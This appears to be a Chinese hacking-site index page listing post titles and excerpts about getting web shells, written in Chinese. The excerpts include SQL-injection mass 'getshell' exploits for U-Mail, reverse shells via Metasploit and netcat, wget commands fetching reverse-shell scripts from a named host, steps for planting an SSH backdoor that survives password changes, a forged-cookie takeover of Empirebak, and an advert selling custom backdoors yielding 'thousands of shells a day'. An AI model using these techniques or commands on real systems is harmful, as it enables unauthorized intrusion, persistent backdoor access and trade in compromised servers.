u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。 Baidu & Google Keywords...
12月31日漏洞时代398 views评论php
shell
U-Mail注入之任意代码写入exp
12月31日漏洞时代398 views评论php
shell
12月31日漏洞时代398 views评论php
shell
骚姿势之shell32.dll执行getpass
metasploit创建反向shell并访问Windows 10系统环境
利用mysql general log 写shell 可行性简要分析
0×01 前言: 实际渗透 过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root 权限,但实际利用into outfile写shell...
11月21日661 views评论mysql
shell
webshell箱子php版本
postgres注入总结
以前遇到pg时顺手做的总结,因为是一条一条测试然后记录的,基本保证没有错误。 包括基础、特性、绕过 与注入点反弹shell,自认为已经比较全面了。 目录: 0x00 前言 .......
11月21日moonsec_com417 views评论shell
注入
中国老版菜刀,红色菜刀 ,黑帽xise菜刀,后门程序定做,日收上千shell
linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行
在线下载 可以用 wget http://www.linux so.com/exp/shell.c wget http://www.linuxso.com/exp/shell.pl
11月21日moonsec_com1,100 views评论linux
shell
帝国备份王(Empirebak)万能cookie及拿shell
帝国备份王(Empirebak)万能cookie及拿shell 漏洞 作者: Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...
11月21日513 views评论cookie
shell
教你ssh后门安装
首先需要root权限,取得root权限后放一个ssh后门,这样就算管理员改了root密码,你也可以通过这个sshbackdoor登入。。。 1、mv /etc/ssh/ssh_config /etc/...
11月21日moonsec_com653 views评论root
shell
php读取3389脚本
经常用到把,读取3389的。 <?php $regkey = 'HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Serv...
11月21日moonsec_com315 views评论com
php
各种环境下的渗透测试
找到切入点后,首先是要弹个shell,一般我用back.py配合nc使用,nc监听端口就不说了。
11月21日moonsec_com498 views评论shell
端口
71